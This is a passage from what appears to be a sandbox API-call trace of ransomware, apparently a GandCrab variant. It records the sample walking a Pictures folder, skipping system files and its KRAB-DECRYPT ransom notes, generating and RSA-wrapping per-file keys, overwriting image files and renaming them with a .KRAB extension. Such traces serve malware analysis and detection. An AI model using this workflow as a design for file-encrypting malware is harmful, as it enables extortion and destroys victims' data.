lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="vdI0_fsaRpZ1Fio.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\vdI0_fsaRpZ1Fio.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\vdI0_fsaRpZ1Fio.bmp" [0097.968] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.968] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\vdI0_fsaRpZ1Fio.bmp.KRAB") returned 75 [0097.969] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\vdI0_fsaRpZ1Fio.bmp") returned 70 [0097.969] lstrlenW (lpString=".bmp") returned 4 [0097.969] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.969] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0097.969] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.969] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\vdI0_fsaRpZ1Fio.bmp") returned 70 [0097.969] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\vdI0_fsaRpZ1Fio.bmp") returned 70 [0097.969] lstrcmpiW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2="desktop.ini") returned 1 [0097.969] lstrcmpiW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2="autorun.inf") returned 1 [0097.969] lstrcmpiW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2="ntuser.dat") returned 1 [0097.970] lstrcmpiW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2="iconcache.db") returned 1 [0097.970] lstrcmpiW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2="bootsect.bak") returned 1 [0097.970] lstrcmpiW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2="boot.ini") returned 1 [0097.970] lstrcmpiW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2="ntuser.dat.log") returned 1 [0097.970] lstrcmpiW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2="thumbs.db") returned 1 [0097.970] lstrcmpiW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2="KRAB-DECRYPT.html") returned 1 [0097.970] lstrcmpiW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.970] lstrcmpiW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.970] lstrcmpiW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2="ntldr") returned 1 [0097.970] lstrcmpiW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2="NTDETECT.COM") returned 1 [0097.970] lstrcmpiW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2="Bootfont.bin") returned 1 [0097.970] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.970] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010f08) returned 1 [0097.970] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.971] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.971] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.971] CryptGenRandom (in: hProv=0x1010f08, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.971] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0097.971] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.971] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0097.972] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.972] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.972] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.972] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.972] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.972] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.972] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0097.973] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.973] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.973] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.973] GetLastError () returned 0x0 [0097.973] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.973] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0097.973] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010f90) returned 1 [0097.973] CryptImportKey (in: hProv=0x1010f90, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.973] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.973] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.974] GetLastError () returned 0x0 [0097.974] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.974] CryptReleaseContext (hProv=0x1010f90, dwFlags=0x0) returned 1 [0097.974] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\vdI0_fsaRpZ1Fio.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\vdi0_fsarpz1fio.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.974] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.974] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.975] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x16547, lpOverlapped=0x0) returned 1 [0097.985] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffe9ab9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.985] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x16547, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x16547, lpOverlapped=0x0) returned 1 [0097.988] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.988] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.991] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.991] CloseHandle (hObject=0x3a8) returned 1 [0097.992] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.992] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\vdI0_fsaRpZ1Fio.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\vdi0_fsarpz1fio.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\vdI0_fsaRpZ1Fio.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\vdi0_fsarpz1fio.bmp.krab")) returned 1 [0097.992] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.993] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.993] lstrcmpW (lpString1="W1QYNarOy2.png", lpString2=".") returned 1 [0097.993] lstrcmpW (lpString1="W1QYNarOy2.png", lpString2="..") returned 1 [0097.993] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="W1QYNarOy2.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\W1QYNarOy2.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\W1QYNarOy2.png" [0097.993] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.993] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\W1QYNarOy2.png.KRAB") returned 70 [0097.993] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\W1QYNarOy2.png") returned 65 [0097.993] lstrlenW (lpString=".png") returned 4 [0097.993] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.993] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".png ") returned 5 [0097.993] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.994] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\W1QYNarOy2.png") returned 65 [0097.994] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\W1QYNarOy2.png") returned 65 [0097.994] lstrcmpiW (lpString1="W1QYNarOy2.png", lpString2="desktop.ini") returned 1 [0097.994] lstrcmpiW (lpString1="W1QYNarOy2.png", lpString2="autorun.inf") returned 1 [0097.994] lstrcmpiW (lpString1="W1QYNarOy2.png", lpString2="ntuser.dat") returned 1 [0097.994] lstrcmpiW (lpString1="W1QYNarOy2.png", lpString2="iconcache.db") returned 1 [0097.994] lstrcmpiW (lpString1="W1QYNarOy2.png", lpString2="bootsect.bak") returned 1 [0097.994] lstrcmpiW (lpString1="W1QYNarOy2.png", lpString2="boot.ini") returned 1 [0097.994] lstrcmpiW (lpString1="W1QYNarOy2.png", lpString2="ntuser.dat.log") returned 1 [0097.994] lstrcmpiW (lpString1="W1QYNarOy2.png", lpString2="thumbs.db") returned 1 [0097.994] lstrcmpiW (lpString1="W1QYNarOy2.png", lpString2="KRAB-DECRYPT.html") returned 1 [0097.994] lstrcmpiW (lpString1="W1QYNarOy2.png", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.994] lstrcmpiW (lpString1="W1QYNarOy2.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.994] lstrcmpiW (lpString1="W1QYNarOy2.png", lpString2="ntldr") returned 1 [0097.994] lstrcmpiW (lpString1="W1QYNarOy2.png", lpString2="NTDETECT.COM") returned 1 [0097.994] lstrcmpiW (lpString1="W1QYNarOy2.png", lpString2="Bootfont.bin") returned 1 [0097.994] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.994] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0097.994] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.995] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.995] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.995] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.995] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.995] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.995] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0097.996] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.996] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.996] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.996] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.996] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.996] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.996] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0097.997] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.997] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.997] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.997] GetLastError () returned 0x0 [0097.997] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.997] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.997] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010f08) returned 1 [0097.997] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.997] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.997] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.998] GetLastError () returned 0x0 [0097.998] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.998] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0097.998] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\W1QYNarOy2.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\w1qynaroy2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.998] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.998] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.999] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x15988, lpOverlapped=0x0) returned 1 [0098.011] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffea678, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.011] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15988, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x15988, lpOverlapped=0x0) returned 1 [0098.011] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0098.011] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.015] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.015] CloseHandle (hObject=0x3a8) returned 1 [0098.015] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.016] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\W1QYNarOy2.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\w1qynaroy2.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\W1QYNarOy2.png.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\w1qynaroy2.png.krab")) returned 1 [0098.016] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.017] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0098.017] lstrcmpW (lpString1="ZsJz1BZJohs.png", lpString2=".") returned 1 [0098.017] lstrcmpW (lpString1="ZsJz1BZJohs.png", lpString2="..") returned 1 [0098.017] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\", lpString2="ZsJz1BZJohs.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\ZsJz1BZJohs.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\ZsJz1BZJohs.png" [0098.017] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.017] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\ZsJz1BZJohs.png.KRAB") returned 71 [0098.017] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\ZsJz1BZJohs.png") returned 66 [0098.017] lstrlenW (lpString=".png") returned 4 [0098.017] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.017] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".png ") returned 5 [0098.017] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.017] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\ZsJz1BZJohs.png") returned 66 [0098.017] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\ZsJz1BZJohs.png") returned 66 [0098.017] lstrcmpiW (lpString1="ZsJz1BZJohs.png", lpString2="desktop.ini") returned 1 [0098.017] lstrcmpiW (lpString1="ZsJz1BZJohs.png", lpString2="autorun.inf") returned 1 [0098.017] lstrcmpiW (lpString1="ZsJz1BZJohs.png", lpString2="ntuser.dat") returned 1 [0098.018] lstrcmpiW (lpString1="ZsJz1BZJohs.png", lpString2="iconcache.db") returned 1 [0098.018] lstrcmpiW (lpString1="ZsJz1BZJohs.png", lpString2="bootsect.bak") returned 1 [0098.018] lstrcmpiW (lpString1="ZsJz1BZJohs.png", lpString2="boot.ini") returned 1 [0098.018] lstrcmpiW (lpString1="ZsJz1BZJohs.png", lpString2="ntuser.dat.log") returned 1 [0098.018] lstrcmpiW (lpString1="ZsJz1BZJohs.png", lpString2="thumbs.db") returned 1 [0098.018] lstrcmpiW (lpString1="ZsJz1BZJohs.png", lpString2="KRAB-DECRYPT.html") returned 1 [0098.018] lstrcmpiW (lpString1="ZsJz1BZJohs.png", lpString2="KRAB-DECRYPT.txt") returned 1 [0098.018] lstrcmpiW (lpString1="ZsJz1BZJohs.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0098.018] lstrcmpiW (lpString1="ZsJz1BZJohs.png", lpString2="ntldr") returned 1 [0098.018] lstrcmpiW (lpString1="ZsJz1BZJohs.png", lpString2="NTDETECT.COM") returned 1 [0098.018] lstrcmpiW (lpString1="ZsJz1BZJohs.png", lpString2="Bootfont.bin") returned 1 [0098.018] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.018] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010df8) returned 1 [0098.018] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.019] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.019] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.019] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0098.019] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.019] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.019] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011678) returned 1 [0098.019] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.020] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.020] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.020] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0098.020] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0098.020] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.020] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0098.020] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0098.020] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0098.020] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0098.021] GetLastError () returned 0x0 [0098.021] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0098.021] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.021] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0098.021] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0098.021] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0098.021] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0098.021] GetLastError () returned 0x0 [0098.021] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0098.021] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.021] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\ZsJz1BZJohs.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\zsjz1bzjohs.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0098.022] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0098.022] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0098.022] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0xcee9, lpOverlapped=0x0) returned 1 [0098.031] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff3117, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 